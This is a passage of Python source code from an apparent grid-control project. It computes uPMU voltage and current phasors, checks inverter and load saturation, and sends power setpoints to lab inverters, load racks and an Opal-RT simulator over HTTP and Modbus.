\n Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase[phase])\n VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase[phase])\n # Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase)\n # VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase)\n flag[phase] = 0\n break\n if flag[phase] == 0:\n break\n if flag[phase] == 1:\n print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n Vmeas_all_phases = 0\n return (Vang_with120degshifts,VangRef,Vang_without120degshifts,Vmag,VmagRef,Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. 
variables bc in case a match isnt found, they're already initialized\n\n # #alternative to find a timestamp at which all voltages are aligned, rather than finding presumably different time steps for each phase\n # #decided not to implement this bc its less flexible than the option above, which appears to be working well at the moment\n # # loops through every ordered_local uPMU reading starting from most recent\n # #each of these would work, I think\n # # for local_packet in reversed(ordered_local[phase]): then i = ordered_local[phase].index(local_packet)\n # # for i, local_packet in reversed(list(enumerate(ordered_local[phase]))):\n # for i in reversed(range(len(ordered_local[0]))):\n # # extract most recent ordered_local uPMU reading\n # for phase in range(nphases):\n # local_time[phase] = int(ordered_local[phase][i]['time'])\n # # loops though every reference uPMU reading starting from most recent\n # # for ref_packet in reversed(ref[phase]):\n # if nphases > 1 and (local_time[0] != local_time[1]):\n # print('WARNING local phase times not matching up')\n # if nphases > 2 and (local_time[1] != local_time[2]):\n # print('WARNING local phase times not matching up')\n # for i in reversed(range(len(ref[0]))):\n # for phase in range(nphases):\n # ref_time[phase] = int(ref[phase][i]['time'])\n # if nphases > 1 and (ref_time[0] != ref_time[1]):\n # print('WARNING ref phase times not matching up')\n # if nphases > 2 and (ref_time[1] != ref_time[2]):\n # print('WARNING ref phase times not matching up')\n #\n # #print(f'ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n #\n # # check timestamps of ordered_local and reference uPMU if within 2 ms\n # # if abs(ref_time - local_time) <= self.pmuTimeWindow:\n # # local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n # # ref_time_index[phase] = ref[phase].index(ref_packet)\n # if all(abs(ref_time - local_time) <= self.pmuTimeWindow):\n # #dont need seperate time indeces for this verion, which checks that all time indeces are lined up for the given time, but leaving in for back-compatibility\n # for phase in range(nphases):\n # local_time_index[phase] = local_time[phase] #saves and returns these so the current measurement can use the measurements from the same timestamps\n # ref_time_index[phase] = ref_time[phase]\n # # Extract measurements from closest timestamps\n # V_mag_local = ordered_local[phase][local_time_index[phase]]['magnitude']\n # V_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n # V_mag_ref = ref[phase][ref_time_index[phase]]['magnitude']\n # V_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n # # V_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] #this can be thought of as the local base angle timestamp\n # V_ang_ref_firstPhase[phase] = ref[0][ref_time_index[phase]]['angle'] #for back-compatibility (all phases)\n # if V_ang_ref_firstPhase == np.NaN or V_ang_ref_firstPhase == None: #(could put in a better check here, eg is the angle in a reasonable range)\n # print('WARNING: issue getting a nonRelative voltage angle. 
This will mess up the LQR controller.')\n #\n # # calculates relative phasors\n # # self.Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n # # self.Vmag[phase] = V_mag_local\n # # self.VmagRef[phase] = V_mag_ref\n # # self.Vmag_relative[phase] = V_mag_local - V_mag_ref\n # # self.Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase[phase])\n # # self.VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase[phase]) #this is the angle that, when added to self.Vang_without120degshifts, gives self.Vang_with120degshifts. Will always be zero for the first phase, and close to [0, -120, 120] for a 3 phase node.\n # # # self.Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase)\n # # # self.VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase)\n # #uncomment above and change the return statement if you want the default to be to use the previous V measurment when V measurements are not successfully calculated for each phase\n # Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n # Vmag[phase] = V_mag_local\n # VmagRef[phase] = V_mag_ref\n # Vmag_relative[phase] = V_mag_local - V_mag_ref\n # Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase[phase])\n # VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase[phase])\n # # Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase)\n # # VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase)\n # flag = 0\n # break\n # if flag == 0:\n # break\n # if flag == 1:\n # print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n # Vmeas_all_phases = 0\n # #self. vars are assigned and returned so that if a match isnt found, it returns the previous match\n # # return (self.Vang_with120degshifts,self.VangRef,self.Vang_without120degshifts,self.Vmag,self.VmagRef,self.Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. variables bc in case a match isnt found, they're already initialized\n # return (Vang_with120degshifts,VangRef,Vang_without120degshifts,Vmag,VmagRef,Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. 
variables bc in case a match isnt found, they're already initialized\n\n\n def phasorI_calc(self, dataWindowLength, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n #uses the same time indices and voltage reference from the voltage search\n # Initialize\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ref = [0] * nphases #dont think this is ever needed, current is not a relative measurement the way voltage is\n flag = [1] * nphases\n
\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n # if len(local_phasors[plug]) > self.nPhasorReadings:\n # dataWindowLength = self.nPhasorReadings\n # else:\n # dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n # the + nphases gives the current rather than the voltage measurements\n ordered_local[phase_idx] = local_phasors[plug + nphases][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed to be in A,B,C order)\n # no + nphases for ref bc you WANT the voltage ref\n ref[plug] = reference_phasors[plug][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n
\n #havent debugged this yet..\n print(';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;')\n for phase in range(nphases): #phase index made explicit; 'phase' was previously referenced in these debug prints before being defined\n print(f'Current ordered_local[{phase}][0][time] ', ordered_local[phase][0]['time'])\n print(f'Current ordered_local[{phase}][-1][time] ', ordered_local[phase][-1]['time'])\n print(f'Current ref[{phase}][0][time] ', ref[phase][0]['time'])\n print(f'Current ref[{phase}][-1][time] ', ref[phase][-1]['time'])\n
\n Imag = np.asarray([np.NaN]*nphases)\n ImagSum = np.zeros(nphases)\n ImagCount = np.zeros(nphases)\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Imagi = local_packet['magnitude']\n if Imagi is None:\n print('Imagi is None')\n elif np.isnan(Imagi):\n print('Imagi is NaN')\n elif Imagi == 0:\n print('Imagi is 0')\n else:\n ImagSum[phase] += Imagi\n ImagCount[phase] += 1\n Imag[phase] = ImagSum[phase]/ImagCount[phase]\n print('ImagCount ', ImagCount)\n print('Imag ', Imag)\n print(';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;')\n
\n Iang_notRelative = np.asarray([np.NaN]*nphases)\n local_time_index = [np.NaN]*nphases\n ref_time_index = [np.NaN]*nphases\n\n IangCount = np.zeros(nphases)\n Iang_notRelativeSum = np.zeros(nphases)\n\n refAngleUsedVec = np.zeros(dataWindowLength) # to check if any refs are used twice (they shouldnt be)\n #for ref_i, ref_packet in enumerate(reversed(ref[phase])):\n
\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading starting from most recent\n for local_packet in reversed(ordered_local[phase]): #doesnt need to be reversed when using averaging (as done now), but doesnt hurt\n # extract most recent ordered_local uPMU reading\n local_time = int(local_packet['time'])\n # loops though every reference uPMU reading starting from most recent\n for ref_packet in reversed(ref[phase]):\n ref_time = int(ref_packet['time'])\n
\n # check timestamps of ordered_local and reference uPMU if within 2 ms\n if abs(ref_time - local_time) <= self.pmuTimeWindow:\n local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n ref_time_index[phase] = ref[phase].index(ref_packet)\n # Extract measurements from closest timestamps\n I_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n V_ang_ref_firstPhaseTemp = ref[0][ref_time_index[phase]]['angle']\n # I_ang_local = self.PhasorV_ang_wraparound_1d(ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift)\n # V_ang_ref_firstPhaseTemp = self.PhasorV_ang_wraparound_1d(ref[0][ref_time_index[phase]]['angle'])\n
\n if V_ang_ref_firstPhaseTemp is None or np.isnan(V_ang_ref_firstPhaseTemp): #was '== np.NaN or == None', which never triggers; (could put in a better check here, eg is the angle in a reasonable range)\n print('WARNING: [in phasorI_calc] issue getting a nonRelative voltage angle. This will mess up the LQR controller.')\n\n Iang_notRelativeSum[phase] += np.radians(I_ang_local - V_ang_ref_firstPhaseTemp)\n IangCount[phase] += 1\n # if refAngleUsedVec[i] == 1:\n # print('WARNING, this ref angle was already used')\n # refAngleUsedVec[i] = 1\n\n flag[phase] = 0\n #for debugging\n # print(f'Current ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n
\n if flag[phase] == 1:\n print('PhasorI_calc: No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n else:\n Iang_notRelative[phase] = Iang_notRelativeSum[phase]/IangCount[phase]\n\n print('Iang_notRelative ', Iang_notRelative)\n print('IangCount ', IangCount)\n print(';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;')\n\n # return self.Iang_notRelative, self.Iang_relative, self.Imag\n return Iang_notRelative, Imag
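\n\n # --- Illustrative sketch (not part of the original control flow, never called): computing real and reactive power from one matched voltage/current phasor pair, the same per-phase P = |V||I|cos(theta), Q = |V||I|sin(theta) relation used by the commented-out PQ_solver further down. v_mag in volts, i_mag in amps, angles in degrees (the uPMU packet convention above).\n @staticmethod\n def _example_pq_from_phasors(v_mag, v_ang_deg, i_mag, i_ang_deg):\n        theta = np.radians(v_ang_deg - i_ang_deg) #angle of V relative to I, in radians\n        p_kw = v_mag * i_mag * np.cos(theta) / 1000 #real power, kW\n        q_kvar = v_mag * i_mag * np.sin(theta) / 1000 #reactive power, kVAR\n        return p_kw, q_kvar\n
\n # old version that didnt take average\n # def old_phasorI_calc(self, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n def old_phasorI_calc(self, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, local_phasors, nphases, plug_to_V_idx):\n #uses the same time indices and voltage reference from the voltage search\n # Initialize\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ref = [0] * nphases #dont think this is ever needed, current is not a relative measurement the way voltage is\n Imag = [np.NaN] * nphases\n # Iang_relative = [np.NaN] * nphases\n Iang_notRelative = [np.NaN] * nphases\n for plug in range(nphases):\n phase_idx = plug_to_V_idx[plug] #assumes the current plugs are hooked up the same way\n ordered_local[phase_idx] = local_phasors[plug + nphases][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n # ref[plug] = reference_phasors[plug + nphases][-dataWindowLength:] #plug + nphases selects the current data rather than the voltage data\n
\n for phase in range(nphases):\n # Extract measurements from closest timestamps\n I_ang_local = ordered_local[phase][local_time_index[phase]]['angle']\n # I_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n # I_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] # this is wrong, need to Vref[0]\n I_ang_ref_firstPhase = V_ang_ref_firstPhase[phase] # V_ang_ref_firstPhase[phase] = ref[0][ref_time_index[phase]]['angle'] #this is indexed by phase in case the different phase measurements use different time steps\n\n # self.Iang_relative[phase] = np.radians(I_ang_local - I_ang_ref) #uses self. 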
so it defaults to previous value\n # self.Imag[phase] = ordered_local[phase][local_time_index[phase]]['magnitude']\n Iang_notRelative[phase] = np.radians(I_ang_local - I_ang_ref_firstPhase)\n Imag[phase] = ordered_local[phase][local_time_index[phase]]['magnitude']\n\n # return self.Iang_notRelative, self.Iang_relative, self.Imag\n return Iang_notRelative, Imag\n
\n\n # #just uses the most recent current and voltage measurements, doesnt need a match w reference\n # def PQ_solver(self, local_phasors, nphases, plug_to_V_idx):\n # # Initialize\n # V_mag = [0.0] * nphases\n # V_ang = [0.0] * nphases\n # I_mag = [0.0] * nphases\n # I_ang = [0.0] * nphases\n # theta = [0.0] * nphases\n # Pact_kVA = np.asarray([0.0] * nphases)\n # Qact_kVA = np.asarray([0.0] * nphases)\n # ''' COMMENTED OUT FOR CIL TESTING ONLY!\n # for plug in range(nphases):\n # phase_idx = plug_to_V_idx[plug] #assumes plug to V map is the same for uPMUp123 voltage, uPMU123 current and uPMU123 voltage\n # V_mag[phase_idx] = local_phasors[plug][-1]['magnitude'] #pulls out vmeas from uPMU123 not uPMUP123\n # V_ang[phase_idx] = local_phasors[plug][-1]['angle']\n # I_mag[phase_idx] = local_phasors[(nphases + plug)][-1]['magnitude'] # Check plugs!\n # I_ang[phase_idx] = local_phasors[(nphases + plug)][-1]['angle'] # Check plugs!\n # theta[phase_idx] = np.radians(V_ang[phase_idx] - I_ang[phase_idx]) #angle comes in in degrees, theta is calced for each phase, so there shouldnt be any 2pi/3 offsets\n # # P = (VI)cos(theta), Q = (VI)sin(theta)\n # Pact_kVA[phase_idx] = V_mag[phase_idx] * I_mag[phase_idx] * (np.cos(theta[phase_idx]))/1000\n # Qact_kVA[phase_idx] = V_mag[phase_idx] * I_mag[phase_idx] * (np.sin(theta[phase_idx]))/1000\n # '''\n # return (Pact_kVA,Qact_kVA)\n
\n\n def checkSaturationWoImeas(self, nphases, Vcomp, Pcmd_kVA, Qcmd_kVA):\n # compare self.VcompPrev w Vcomp and if it keeps missing in the same direction declare that its saturated\n #could be confused by Q offset\n sat_arrayP = np.ones(nphases) # 1 indicates not saturated\n sat_arrayQ = np.ones(nphases)\n return sat_arrayP, sat_arrayQ\n
\n\n def checkSaturation(self, nphases, Pact, Qact, Pcmd_kVA, Qcmd_kVA, P_PV):\n Pcmd = Pcmd_kVA * 1000\n Qcmd = Qcmd_kVA * 1000\n Pact_VA = Pact*1000\n Qact_VA = Qact*1000\n if self.actType == 'inverter':\n\n '''\n HAD TO COMMENT OUT AND MICKEY MOUSE SATURATION CHECK FOR CIL\n # find indices where Pact + tolerance is less than Pcmd\n #indexP = np.where(abs(Pact_VA + (0.03 * Pcmd)) < abs(Pcmd))[0] #will be zero if Pcmd is zero\n print(f'PactVA: {Pact_VA}, P_PV: {P_PV}, Pact-P_PV+500: {abs(Pact_VA - P_PV)+500}, abs(Pcmd): {abs(Pcmd)}')\n indexP = np.where(abs(Pact_VA - P_PV) + 500 < abs(Pcmd))[0] #specific to step size of inverters\n # find indices where Qact + tolerance is less than Qcmd\n #indexQ = np.where(abs(Qact_VA + (0.03 * Qcmd)) < abs(Qcmd))[0]\n print(f'QactVA+250: {abs(Qact_VA)+250}, abs(Qcmd): {abs(Qcmd)}')\n indexQ = np.where(abs(Qact_VA) + 250 < abs(Qcmd))[0]\n\n '''\n
\n indexP = np.where(abs(Pcmd) >= self.ORT_max_VA/self.localSratio)[0]\n indexQ = np.where(abs(Qcmd) >= self.ORT_max_VA/self.localSratio)[0]\n\n elif self.actType == 'load':\n indexP = np.where(abs(Pcmd) > self.loadrackPlimit/2)[0]\n indexQ = np.where(abs(Qcmd) > self.loadrackPlimit/2)[0]\n elif self.actType == 'modbus':\n indexP = np.where(abs(Pcmd) == self.ORT_max_VA/self.localSratio)[0]\n indexQ = np.where(abs(Qcmd) == self.ORT_max_VA/self.localSratio)[0]\n else:\n raise ValueError('actType error') #was a call to an undefined error() helper\n "Checking for P saturation (anti-windup control)"\n # initialize 
saturation counter for each phase\n sat_arrayP = np.ones(nphases) #\n # stop integrator for saturated phases\n for i in indexP:\n sat_arrayP[i] = 0 #0 where saturated\n "Checking for Q saturation (anti-windup control)"\n # initialize saturation counter for each phase\n sat_arrayQ = np.ones(nphases)\n # stop integrator for saturated phases\n for i in indexQ:\n sat_arrayQ[i] = 0\n return (sat_arrayP, sat_arrayQ)\n
\n\n def determineICDI(self, nphases, sat_arrayP, sat_arrayQ, Pact_pu, Qact_pu):\n # saturation counter check to determine if I Cant Do It signal should be sent to SPBC\n self.Psat = np.append(self.Psat, np.expand_dims(sat_arrayP, axis=1), axis=1)\n self.Psat = self.Psat[:, 1:] #iterates the Psat counter array to include the new value, discards the old\n for phase in range(nphases):\n if phase in np.where(~self.Psat.any(axis=1))[0]: #if each row doesnt have a 1 in it, then send ICDI for that phase\n self.ICDI_sigP[phase] = True\n if self.actType == 'inverter':\n '''\n COMMENTED OUT FOR CIL TESTING\n #self.Pmax_pu[phase] = Pact_pu[phase]\n '''\n self.Pmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n elif self.actType == 'load':\n self.Pmax_pu[phase] = (self.loadrackPlimit/2)/(self.localkVAbase[phase] *1000) #Sratio double counted in localkVAbase\n elif self.actType == 'modbus':\n self.Pmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n else:\n self.ICDI_sigP[phase] = False\n self.Pmax_pu[phase] = np.NaN\n
\n self.Qsat = np.append(self.Qsat, np.expand_dims(sat_arrayQ, axis=1), axis=1)\n self.Qsat = self.Qsat[:, 1:]\n for phase in range(nphases):\n if phase in np.where(~self.Qsat.any(axis=1))[0]:\n self.ICDI_sigQ[phase] = True\n if self.actType == 'inverter':\n '''\n COMMENTED OUT FOR CIL TESTING\n self.Qmax_pu[phase] = Qact_pu[phase]\n '''\n self.Qmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n elif self.actType == 'load':\n self.Qmax_pu[phase] = 0\n elif self.actType == 'modbus':\n self.Qmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n else:\n self.ICDI_sigQ[phase] = False\n self.Qmax_pu[phase] = np.NaN\n return (self.ICDI_sigP, self.ICDI_sigQ, self.Pmax_pu, self.Qmax_pu)
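\n\n # --- Illustrative sketch (not part of the original control flow, never called): the anti-windup/ICDI pattern used by checkSaturation and determineICDI above, reduced to one phase. sat_history is a hypothetical rolling record of saturation flags (1 = not saturated); an I-Cant-Do-It signal is raised only when every entry is saturated, so a single noisy sample cannot trip the flag.\n @staticmethod\n def _example_icdi_from_history(sat_history):\n        sat_history = np.asarray(sat_history)\n        return not sat_history.any() #True (send ICDI) only if saturated at every step in the history\n
\n\n def httptoInverters(self, nphases, act_idxs, Pcmd_kVA, Qcmd_kVA, Pact):\n # hostname: http://131.243.41.47:\n # port: 9090\n # Sends P and Q command to actuator\n #needs an up-to-date Pact, which requires a current measurement\n #HERE Pact is defined as positive out of the network into the inverter (Pact, Pbatt and P_PV are all positive out of the network in flexlab). This convention should be switched in later implementations, but shouldnt require changing (too many) signs\n Pcmd_VA = Pcmd_kVA*1000 # *** SIGNS CHANGED 5/21/20!!! 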
***\n Qcmd_VA = Qcmd_kVA*1000 #HERE Power factor as positive for Q into the network, which is backwards of the rest of the conventions\n #initialize parallel API command:\n session = FuturesSession()\n urls = []\n commandReceipt = np.zeros(nphases).tolist()\n if self.mode == 1: #1: PV as disturbance\n self.P_PV = (Pact*1000) - self.batt_cmd #P_PV is defined as positive into the solar panel (to be consistent w battery convention) #batt_cmd from last round, still in effect\n for i, inv in zip(range(nphases), act_idxs):\n self.batt_cmd[i] = int(round(Pcmd_VA[i])) #in mode 1 the battery is controlled directly\n if abs(self.batt_cmd[i]) > self.batt_max:\n self.batt_cmd[i] = int(np.sign(Pcmd_VA[i]) * self.batt_max)\n if ((self.batt_cmd[i] + self.P_PV[i])**2 + Qcmd_VA[i]**2) > (self.inv_s_max)**2: #if Qcmd is over the max, set it to the max for the given P command (favors P over Q)\n Qcmd_VA[i] = np.sign(Qcmd_VA[i]) * np.sqrt((self.inv_s_max)**2 - (self.batt_cmd[i] + self.P_PV[i])**2) #what happens by default? it probably maintains the PF command and just produces less P (and the battery curtails itself naturally)\n self.pf_ctrl[i] = (np.sign(Qcmd_VA[i])*-1. * abs(self.batt_cmd[i] + self.P_PV[i])) / \\\n (np.sqrt(((self.batt_cmd[i] + self.P_PV[i])**2) + (Qcmd_VA[i]**2))) #self.batt_cmd[i] + P_PV is ~ the full P flowing through the inverter\n if np.abs(self.pf_ctrl[i]) < 0.1:\n self.pf_ctrl[i] = 0.1 #was 'pf_ctrl = 0.1', which assigned a stray local and had no effect\n print(f'pf cmd: {self.pf_ctrl[i]}, batt cmd: {self.batt_cmd[i]}')\n urls.append(f"http://131.243.41.47:9090/control?Batt_ctrl={self.batt_cmd[i]},pf_ctrl={self.pf_ctrl[i]},inv_id={inv}")\n
\n if self.mode == 2: #mode 2: PV calculated (from previous timestep)\n self.P_PV = Pact - self.batt_cmd #batt_cmd from last round, still in effect\n for i, inv in zip(range(nphases), act_idxs):\n self.batt_cmd[i] = int(round(Pcmd_VA[i] - self.P_PV[i])) #in mode 2 the battery and PV are controlled jointly\n if abs(self.batt_cmd[i]) > self.batt_max:\n self.batt_cmd[i] = int(np.sign(Pcmd_VA[i]) * self.batt_max)\n if (self.batt_cmd[i]**2 + Qcmd_VA[i]**2) > (self.inv_s_max)**2: #if Qcmd is over the max, set it to the max for the given P command (favors P over Q)\n Qcmd_VA[i] = np.sign(Qcmd_VA[i]) * np.sqrt((self.inv_s_max)**2 - self.batt_cmd[i]**2)\n self.pf_ctrl[i] = (np.sign(Qcmd_VA[i])*-1. * abs(self.batt_cmd[i])) / \\\n (np.sqrt((self.batt_cmd[i]**2) + (Qcmd_VA[i]**2))) #self.batt_cmd is ~ the full P flowing through the inverter\n if np.abs(self.pf_ctrl[i]) < 0.1:\n self.pf_ctrl[i] = 0.1 #was 'pf_ctrl = 0.1', which assigned a stray local and had no effect\n print(f'pf cmd: {self.pf_ctrl[i]}, batt cmd: {self.batt_cmd[i]}')\n urls.append(f"http://131.243.41.47:9090/control?Batt_ctrl={self.batt_cmd[i]},pf_ctrl={self.pf_ctrl[i]},inv_id={inv}")\n
\n if self.mode == 3: #mode 3: PV only (no battery commands)\n Pcmd_VA = -Pcmd_VA #HERE for inverter control, P is positive into the network (offsets negative at the beginning of this function)\n for i, inv in zip(range(nphases), act_idxs): #HERE make sure act_idxs is working\n Inv_Pperc_max = 97\n #in mode 3 p_ctrl is used instead of battery control, to control PV\n if Pcmd_VA[i] < 0:\n Pcmd_VA[i] = 0\n self.invPperc_ctrl[i] = (Pcmd_VA[i] / self.inv_s_max_commands) * 100 #invPperc_ctrl cannot be negative\n if self.invPperc_ctrl[i] > Inv_Pperc_max:\n self.invPperc_ctrl[i] = Inv_Pperc_max\n self.pf_ctrl[i] = 1\n # pf_ctrl = ((np.sign(Qcmd_VA[i]) * -1.0) * Inv_Pperc_max\n else:\n self.pf_ctrl[i] = (np.sign(Qcmd_VA[i])*-1. 
* abs(Pcmd_VA[i])) / \\\n (np.sqrt((Pcmd_VA[i] ** 2) + (Qcmd_VA[i] ** 2)))\n if np.abs(self.pf_ctrl[i]) < 0.1:\n self.pf_ctrl[i] = 0.1\n print(f'pf cmd: {self.pf_ctrl[i]}, batt cmd: {self.batt_cmd[i]}')\n urls.append(f\"http://131.243.41.47:9090/control?P_ctrl={self.invPperc_ctrl[i]},pf_ctrl={self.pf_ctrl[i]},inv_id={inv}\")\n responses = map(session.get, urls)\n results = [resp.result() for resp in responses]\n for i in range(nphases):\n if results[i].status_code == 200:\n commandReceipt[i] = 'success'\n else:\n commandReceipt[i] = 'failure'\n return commandReceipt\n\n\n def httptoLoads(self, nphases, act_idxs, Pcmd_kVA, Qcmd_kVA):\n #load commands are between 0 and 2000, but from the LPBC's perspective it can control between -1000 and 1000 W, with 1000 W collocated\n #Pcmd is power into the network, but load commands are just load power (power of out of the network)\n Pcmd_VA = Pcmd_kVA*1000\n Qcmd_VA = Qcmd_kVA*1000\n #initialize parallel API command:\n session = FuturesSession()\n urls = []\n commandReceipt = np.zeros(nphases).tolist()\n for i, group in zip(range(nphases), act_idxs): #same as enumerate\n self.load_cmd[i] = int(np.round((-1. * Pcmd_VA[i]) + self.loadrackPlimit/2)) # -1* bc command goes to a load not an inverter, +self.loadrackPlimit/2 centers the command around 0\n if self.load_cmd[i] > self.loadrack_manuallimit: #self.loadrackPlimit:\n urls.append(f\"http://131.243.41.118:9090/control?group_id={group},P_ctrl={self.loadrack_manuallimit}\")\n elif self.load_cmd[i] < 0:\n urls.append(f\"http://131.243.41.118:9090/control?group_id={group},P_ctrl=0\")\n else:\n urls.append(f\"http://131.243.41.118:9090/control?group_id={group},P_ctrl={self.load_cmd[i]}\")\n responses = map(session.get, urls)\n results = [resp.result() for resp in responses]\n for i in range(nphases):\n if results[i].status_code == 200:\n commandReceipt[i] = 'success'\n else:\n commandReceipt[i] = 'failure'\n return commandReceipt\n\n\n def modbustoOpal(self, nphases, Pcmd_kVA, Qcmd_kVA, ORT_max_VA, localSratio, client ):\n Pcmd_VA = -1 * (Pcmd_kVA * 1000) #sign negation is convention of modbus\n Qcmd_VA = -1 * (Qcmd_kVA * 1000) #sign negation is convention of modbus\n for phase in range(nphases):\n print(f'Opal Pcmd_VA[{phase}] : ' + str(Pcmd_VA[phase]))\n print(f'Opal Qcmd_VA[{phase}] : ' + str(Qcmd_VA[phase]))\n print('ORT_max_VA/localSratio : ' + str(ORT_max_VA/localSratio))\n if abs(Pcmd_VA[phase]) > ORT_max_VA/localSratio:\n print('WARNING Pcmd over Opal limit, using +/- max: ', np.sign(Pcmd_VA[phase]) * ORT_max_VA/localSratio)\n Pcmd_VA[phase] = np.sign(Pcmd_VA[phase]) * ORT_max_VA/localSratio\n if abs(Qcmd_VA[phase]) > ORT_max_VA/localSratio:\n print('WARNING Qcmd over Opal limit, using +/- max: ', np.sign(Qcmd_VA[phase]) * ORT_max_VA/localSratio)\n Qcmd_VA[phase] = np.sign(Qcmd_VA[phase]) * ORT_max_VA/localSratio\n id = 3\n # P,Q commands in W and VAR (not kilo)\n P_implemented_PU = Pcmd_VA/(self.localkVAbase*1000) #HERE bc Pcmd_VA = Pcmd_PU * self.localkVAbase * 1000\n Q_implemented_PU = Qcmd_VA/(self.localkVAbase*1000)\n\n if nphases == 3:\n P1, P2, P3 = abs(Pcmd_VA[0]), abs(Pcmd_VA[1]), abs(Pcmd_VA[2])\n Q1, Q2, Q3 = abs(Qcmd_VA[0]), abs(Qcmd_VA[1]), abs(Qcmd_VA[2])\n # TODO modbus only: manually change phase actuation on modbus here if needed on different phase\n elif nphases == 1:\n P1, P2, P3 = abs(Pcmd_VA[0]), 0, 0\n Q1, Q2, Q3 = abs(Qcmd_VA[0]), 0, 0\n\n elif nphases == 2: # Phase A, B only (change if needed)\n P1, P2, P3 = abs(Pcmd_VA[0]), abs(Pcmd_VA[1]), 0\n Q1, Q2, Q3 = abs(Qcmd_VA[0]), 
abs(Qcmd_VA[1]), 0\n\n # set signs of commands through sign_vec\n # P,Q 1 is positive, 0 is negative\n sign_vec = []\n for p, q in zip(Pcmd_VA, Qcmd_VA):\n if p >= 0:\n sign_vec.append(1)\n if p < 0:\n sign_vec.append(0)\n if q >= 0:\n sign_vec.append(1)\n if q < 0:\n sign_vec.append(0)\n
\n if nphases == 3:\n print('sign_vec ', sign_vec)\n sign_base = 2 ** 5 * sign_vec[0] + 2 ** 4 * sign_vec[1] + 2 ** 3 * sign_vec[2] + 2 ** 2 * sign_vec[3] + 2 ** 1 * sign_vec[4] + 2 ** 0 * sign_vec[5]\n # TODO modbus only: manually change phase actuation on modbus here for sign base if needed on different phase\n elif nphases == 1:\n sign_base = 2 ** 5 * sign_vec[0] + 2 ** 4 * sign_vec[1]\n\n elif nphases == 2: # Phase A, B only (change if needed)\n sign_base = 2 ** 5 * sign_vec[0] + 2 ** 4 * sign_vec[1] + 2 ** 3 * sign_vec[2] + 2 ** 2 * sign_vec[3]\n
\n\n mtx = [P1, Q1, P2, Q2, P3, Q3, sign_base]\n print('mtx : ' + str(mtx))\n mtx_register = np.arange(1, 8).tolist()\n try:\n client.connect()\n # write switch positions for config\n for i in range(len(mtx)):\n client.write_registers(int(mtx_register[i]), int(mtx[i]), unit=id)\n result = 'sent'\n except Exception as e:\n result = ('exceptions', e)\n finally:\n client.close()\n\n return result\n # return result, P_implemented_PU, Q_implemented_PU\n
